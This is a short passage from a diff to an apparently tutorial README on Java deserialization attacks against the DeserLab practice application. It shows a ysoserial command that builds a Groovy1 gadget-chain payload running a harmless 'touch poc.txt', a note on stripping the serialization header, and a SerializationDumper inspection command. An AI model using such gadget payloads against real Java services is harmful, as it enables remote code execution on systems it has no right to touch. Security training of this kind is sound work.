punishell/DeserializationForDummies/README.md

 java -jar ysoserial.jar Groovy1 "touch poc.txt" > thepayload.bin
 ```

+Ofc we put our payload without **0xAC ED 00 05**,because generated payload statrs with it.
 How it should look like:
 ```
 java -jar SerializationDumper.jar -r ../DeserLab-v1.0/withpayload.bin